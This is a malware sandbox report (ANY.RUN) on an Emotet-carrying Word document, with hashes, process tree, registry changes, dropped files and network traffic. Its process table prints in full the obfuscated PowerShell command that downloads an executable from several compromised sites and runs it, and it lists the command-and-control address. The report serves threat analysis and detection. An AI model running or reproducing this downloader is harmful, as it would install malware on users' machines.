File name: | Doc 543228 318165.doc |
Full analysis: | https://app.any.run/tasks/6332fdfb-a70b-44ea-b7d5-42ab43bd3cec |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | May 15, 2019, 14:29:24 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Movies, Subject: Roads, Author: Lempi Greenholt, Comments: seamless, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue May 14 23:43:00 2019, Last Saved Time/Date: Tue May 14 23:43:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 169, Security: 0 |
MD5: | F0B8D0083EFDF5162118FFB7AC7A6944 |
SHA1: | 384BB6E06691E48AA3CEA3D76EC4EC7DF7B24E8D |
SHA256: | EDD7683434BF4B5DCF6E62052C0D260F9CE2824BCD2E7FC527680DC96CF84FA0 |
SSDEEP: | 3072:m77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qE6Q0DyRv7nG5osJ:m77HUUUUUUUUUUUUUUUUUUUT52VWxDyC |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Manager: | Zemlak |
---|---|
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 197 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Bednar and Sons |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 169 |
Words: | 29 |
Pages: | 1 |
ModifyDate: | 2019:05:14 22:43:00 |
CreateDate: | 2019:05:14 22:43:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | seamless |
Keywords: | - |
Author: | Lempi Greenholt |
Subject: | Roads |
Title: | Movies |
CompObjUserType: | Microsoft Word 97-2003 Document |
CompObjUserTypeLen: | 32 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3516 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Doc 543228 318165.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 Modules
| |||||||||||||||
3264 | powershell -enc JABTADUAMAA1ADMANwA1ADMAPQAnAFkAXwA2ADgAMgBfADQAJwA7ACQAQwA0ADkANwAxAF8AIAA9ACAAJwA2ADYANAAnADsAJABuAF8ANQA4ADkAXwA9ACcAaAA3ADAANgAwADIANwAnADsAJABaADIAMQAzADEAXwA1AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABDADQAOQA3ADEAXwArACcALgBlAHgAZQAnADsAJABPADMANgA4ADEAOQA9ACcAWAA2ADUAMwAwADQANQAwACcAOwAkAGgANwAyAF8AMgAzADMAPQAuACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4AYABlAFQALgB3AEUAYABCAEMATABpAEUAYABOAFQAOwAkAFEAMgAzAF8ANwBfAD0AJwBoAHQAdABwADoALwAvAGEAbgBnAGUAbAB5AG8AcwBoAC4AYwBvAG0ALwBhAG4AZAByAGUAYQBwAHUAdAByAGkAYQBuAGEALgBvAG4AbABpAG4AZQAvAFEAUwBTAFYASABrAEIAWQAvAEAAaAB0AHQAcAA6AC8ALwA0AGkAbQAuAHUAcwAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGMATQBIAEcATgBXAFIATgAvAEAAaAB0AHQAcAA6AC8ALwBzAG8AbAB1AHQAaQBvAG4AcAB1AGIALgBkAHoALwB3AHAALQBhAGQAbQBpAG4ALwBNAGEAagBPAFEARwBwAEkALwBAAGgAdAB0AHAAOgAvAC8AYQBsAGEAbgBrAGkAcABwAGEAeAAuAGkAbgBmAG8ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ATQB2AEEAWABvAGcAcwB4AHIAUQAvAEAAaAB0AHQAcAA6AC8ALwBwAGEAcgB0AHQAaQBtAGUAcABhAHoAYQByAGwAYQBtAGEALgBjAG8AbQAvAHMAaQB0AGUAbQBhAHAAcwAyADEAMgAvAGgAcgBVAHAAZQBsAGoASAAvACcALgBTAFAAbABJAFQAKAAnAEAAJwApADsAJABTADEAMgA3ADQAMgA9ACcAaQA3AF8AMQA1ADEAMQAnADsAZgBvAHIAZQBhAGMAaAAoACQAegA2ADgAXwBfADUAIABpAG4AIAAkAFEAMgAzAF8ANwBfACkAewB0AHIAeQB7ACQAaAA3ADIAXwAyADMAMwAuAGQAbwBXAE4ATABvAEEARABmAGkATABFACgAJAB6ADYAOABfAF8ANQAsACAAJABaADIAMQAzADEAXwA1ACkAOwAkAFUANwA1ADkAMwBfAD0AJwBWADIANQAwADMANgA3ACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAWgAyADEAMwAxAF8ANQApAC4ATABFAE4AZwBUAGgAIAAtAGcAZQAgADIANAA3ADEAMQApACAAewAmACgAJwBJAG4AJwArACcAdgBvAGsAZQAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABaADIAMQAzADEAXwA1ADsAJABCADIAOABfADUAXwA9ACcAdQAxADUAMgA0ADIAJwA7AGIAcgBlAGEAawA7ACQAQQA0ADMANAAyADIAPQAnAHQAXwA1ADkANQAyACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAOQAxADYANAA1ADIANgA9ACcAQgA4AF8ANAA5ADMAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
1668 | "C:\Users\admin\664.exe" | C:\Users\admin\664.exe | — | powershell.exe | |||||||||||
User: admin Company: Lovelysoft Integrity Level: MEDIUM Description: Process Manager Remote Server Exit code: 0 Version: 1.8.0.1800 Modules
| |||||||||||||||
3524 | --43274a32 | C:\Users\admin\664.exe | 664.exe | ||||||||||||
User: admin Company: Lovelysoft Integrity Level: MEDIUM Description: Process Manager Remote Server Exit code: 0 Version: 1.8.0.1800 Modules
| |||||||||||||||
480 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 664.exe | ||||||||||||
User: admin Company: Lovelysoft Integrity Level: MEDIUM Description: Process Manager Remote Server Exit code: 0 Version: 1.8.0.1800 Modules
| |||||||||||||||
3360 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | ||||||||||||
User: admin Company: Lovelysoft Integrity Level: MEDIUM Description: Process Manager Remote Server Version: 1.8.0.1800 Modules
|
(PID) Process: | (3516) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | #23 |
Value: 23323300BC0D0000010000000000000000000000 | |||
(PID) Process: | (3516) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (3516) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (3516) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1320091678 | |||
(PID) Process: | (3516) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1320091792 | |||
(PID) Process: | (3516) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1320091793 | |||
(PID) Process: | (3516) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: BC0D00007294BEA12A0BD50100000000 | |||
(PID) Process: | (3516) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | {33 |
Value: 7B333300BC0D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (3516) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | {33 |
Value: 7B333300BC0D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (3516) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3E83.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3264 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KL882AJCUZRYIXIWK652.temp | — | |
MD5:— | SHA256:— | |||
3516 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:B19FF5CEFD1DA5D0F2805A945B570C3C | SHA256:F75A592B67565D406D9D7F15EC8C276CD6D0D5E54AD5EF87413F565E44175FC9 | |||
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:D6BF4FAF982B5B9431C430AAC93FD17D | SHA256:75CDB1F173A92EB059A3EA92CF907A30DD00949E68C64361AE63DF8D59AE8C2E | |||
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B99C965F.wmf | wmf | |
MD5:6C084890B480DB70236D24F9173266F8 | SHA256:387BDF462DC95406765887749796394F79699585ACCFC1042133D2E42B23BAD7 | |||
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\73C21769.wmf | wmf | |
MD5:C718CAE0782EDD9BF31F683ED68F4ADC | SHA256:238E7C54D90814ECE916828A360FCE7DB2186A677F9954FA62DBFB589DAF8227 | |||
3264 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7767C308.wmf | wmf | |
MD5:9B65CF0D4A58398412C8EC8D16152AA9 | SHA256:8CE15822FFCF829484971BBBD8086F328535E55B3EC81398441956D8C82A7E39 | |||
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F700656.wmf | wmf | |
MD5:A555A7CB5733868AD7EEDB061FD43C37 | SHA256:29D5A5AE1396648E98E596559EC05365D60736A401A74DE906002F23298B7F0A | |||
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F6BFE02.wmf | wmf | |
MD5:229F6121176F5A508C8BE5B6378D66E0 | SHA256:C282B57D0D3D54E29F88B682055383F30A79ECFB535BEB57B9794A33D8A410A0 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3264 | powershell.exe | GET | 200 | 111.68.113.243:80 | http://angelyosh.com/andreaputriana.online/QSSVHkBY/ | ID | executable | 171 Kb | suspicious |
3360 | soundser.exe | POST | — | 90.57.69.215:80 | http://90.57.69.215/schema/json/ringin/merge/ | FR | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3264 | powershell.exe | 111.68.113.243:80 | angelyosh.com | Varnion Technology Semesta, PT | ID | suspicious |
3360 | soundser.exe | 90.57.69.215:80 | — | Orange | FR | malicious |
Domain | IP | Reputation |
---|---|---|
angelyosh.com |
| suspicious |